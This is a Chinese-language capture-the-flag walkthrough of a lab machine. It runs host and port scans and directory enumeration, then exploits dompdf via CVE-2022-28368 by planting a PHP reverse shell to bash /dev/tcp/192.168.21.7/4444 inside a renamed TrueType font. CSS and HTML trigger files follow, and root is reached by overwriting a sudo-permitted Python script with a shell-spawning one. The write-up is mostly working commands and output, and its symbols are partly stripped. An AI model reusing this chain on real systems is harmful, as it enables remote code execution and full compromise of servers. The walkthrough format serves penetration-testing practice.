信息搜集主机发现┌──(kali㉿kali)-[~] └─$ nmap -sn 192.168.21.0/24 Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-24 02:18 EDT Nmap scan report for 192.168.21.6 Host is up (0.00046s latency). MAC Address: 08:00:27:E7:D5:88 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.21.7 Host is up. Nmap done: 256 IP addresses (6 hosts up) scanned in 2.77 seconds端口扫描┌──(kali㉿kali)-[~] └─$ nmap -sV -p- 192.168.21.6 Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-24 02:19 EDT Nmap scan report for 192.168.21.6 Host is up (0.00041s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2deb12u2 (protocol 2.0) 80/tcp open http nginx 1.22.1 MAC Address: 08:00:27:E7:D5:88 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.74 seconds漏洞利用看一下80端口HTML-to-PDF转换器目录枚举┌──(kali㉿kali)-[~] └─$ gobuster dir -w SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x html,php,txt,jpg,png,zip,git -u http://192.168.21.6 Gobuster v3.6 by OJ Reeves (TheColonial) Christian Mehlmauer (firefart) [] Url: http://192.168.21.6 [] Method: GET [] Threads: 10 [] Wordlist: SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt [] Negative Status codes: 404 [] User Agent: gobuster/3.6 [] Extensions: html,php,txt,jpg,png,zip,git [] Timeout: 10s Starting gobuster in directory enumeration mode /index.php (Status: 200) [Size: 1026] /upload (Status: 301) [Size: 169] [-- http://192.168.21.6/upload/] Progress: 9482032 / 9482040 (100.00%) Finished 尝试文件包含但是没有成功看了一下好像是CVE-2022-28368寻找一个.ttf字体文件将其改为.php文件并添加上shell┌──(kali㉿kali)-[~] └─$ find / -name *.ttf 2/dev/null ┌──(kali㉿kali)-[~] └─$ cp /usr/lib/gophish/static/font/fontawesome-webfont.ttf ./exp.php ┌──(kali㉿kali)-[~] └─$ echo ?php system(bash -c \bash -i /dev/tcp/192.168.21.7/4444 01\); ? ./exp.php在创建一个css文件┌──(kali㉿kali)-[~] └─$ cat exp.css font-face { font-family: exp; src: url(http://192.168.21.7:8080/exp.php); font-weight: normal; font-style: normal; }在创建一个html文件借此来触发┌──(kali㉿kali)-[~] └─$ cat exp.html !DOCTYPE html html head link relstylesheet hrefhttp://192.168.21.7:8080/exp.css /head body div stylefont-family: exp; New Font... /div /body /html开始利用┌──(kali㉿kali)-[~] └─$ python -m http.server 8080 网页触发http://192.168.21.7:8080/exp.html 成功触发 192.168.21.6 - - [24/Apr/2026 04:11:08] GET /exp.html HTTP/1.1 200 - 192.168.21.6 - - [24/Apr/2026 04:11:08] GET /exp.css HTTP/1.1 200 - 192.168.21.6 - - [24/Apr/2026 04:11:08] GET /exp.php HTTP/1.1 200 - 缓存文件名是基于字体名、样式、权重和MD5哈希生成的格式为字体族名_字体样式_md5哈希值.php计算一下MD5是多少┌──(kali㉿kali)-[~]└─$ echo -n “http://192.168.21.7:8080/exp.php” | md5sum12c572ccb65e130e206986e53354e0af -通常缓存在/vendor/dompdf/dompdf/lib/fonts/目录下尝试触发┌──(kali㉿kali)-[~]└─$ curl “http://192.168.21.6/dompdf/lib/fonts/exp_normal_12c572ccb65e130e206986e53354e0af.php”Warning: Binary output can mess up your terminal. Use “–output -”Warning: to tell curl to output it to your terminal anyway, orWarning: consider “–output ” to save to a file.┌──(kali㉿kali)-[~]└─$ nc -lvnp 4444listening on [any] 4444 …connect to [192.168.21.7] from (UNKNOWN) [192.168.21.6] 41868bash: cannot set terminal process group (484): Inappropriate ioctl for devicebash: no job control in this shellevaconvert:/var/www/html/dompdf/lib/fonts$ ididuid1000(eva) gid1000(eva) groups1000(eva)# 权限提升evaconvert:/var/www/html$ sudo -lsudo -lMatching Defaults entries for eva on convert:env_reset, mail_badpass,secure_path/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin,use_ptyUser eva may run the following commands on convert:(ALL : ALL) NOPASSWD: /usr/bin/python3 /home/eva/pdfgen.py *//我们在eva目录下拥有写的权限evaconvert:/var/www/html$ cat /home/eva/pdfgen.pycat /home/eva/pdfgen.pyfrom os import pathfrom time import timefrom weasyprint import HTML, CSSfrom urllib.parse import urlparsefrom argparse import ArgumentParserfrom logging import basicConfig, INFO, error, info, exceptiondef prune_log(log_file, max_size1):try:log_size path.getsize(log_file) / (1024 * 1024)if log_size max_size:with open(log_file, ‘w’):passinfo(fLog file pruned. Size exceeded {max_size} MB.“)print(fLog file pruned. Size exceeded {max_size} MB.”)except Exception as e:print(fError pruning log file: {e})log_file ‘/home/eva/pdf_gen.log’prune_log(log_file)basicConfig(levelINFO, filenamelog_file, filemode‘a’,format‘%(asctime)s - %(levelname)s - %(message)s’)def is_path_allowed(output_path):blocked_directories [“/root”, “/etc”]for directory in blocked_directories:if output_path.startswith(directory):return Falsereturn Truedef url_html_to_pdf(url, output_path):block_schemes [“file”, “data”]block_hosts [“127.0.0.1”, “localhost”]blocked_directories [“/root”, “/etc”]try: start_time time() scheme urlparse(url).scheme hostname urlparse(url).hostname if scheme in block_schemes: error(f{scheme} scheme is Blocked) print(fError: {scheme} scheme is Blocked) return if hostname in block_hosts: error(f{hostname} hostname is Blocked) print(fError: {hostname} hostname is Blocked) return if not is_path_allowed(output_path): error(fOutput path is not allowed in {blocked_directories} directories) print(fError: Output path is not allowed in {blocked_directories} directories) return html HTML(url.strip()) html.write_pdf(output_path, stylesheets[CSS(stringpage { size: A3; margin: 1cm })]) end_time time() elapsed_time end_time - start_time info(fPDF generated successfully at {output_path} in {elapsed_time:.2f} seconds) print(fPDF generated successfully at {output_path} in {elapsed_time:.2f} seconds) except Exception as e: exception(fError: {e}) print(fError: {e})ifname “main”:parser ArgumentParser(description“Convert HTML content from a URL to a PDF file.”)parser.add_argument(“-U”, “–url”, help“URL of the HTML content to convert”, requiredTrue)parser.add_argument(“-O”, “–out”, help“Output file path for the generated PDF”, default“/home/eva/output.pdf”)args parser.parse_args() url_html_to_pdf(args.url, args.out)//创建一个恶意文件evaconvert:/var/www/html$ echo ‘import os; os.system(“/bin/bash”)’ /home/eva/exp.pyport os; os.system(“/bin/bash”)’ /home/eva/exp.py//将其把原来的文件替换掉evaconvert:/var/www/html$ mv /home/eva/exp.py /home/eva/pdfgen.pymv /home/eva/exp.py /home/eva/pdfgen.py//以root的身份执行我们的脚本pwned没任何作用只是为了符合带参数条件evaconvert:/var/www/html$ sudo /usr/bin/python3 /home/eva/pdfgen.py pwnedsudo /usr/bin/python3 /home/eva/pdfgen.py pwnediduid0(root) gid0(root) groups0(root)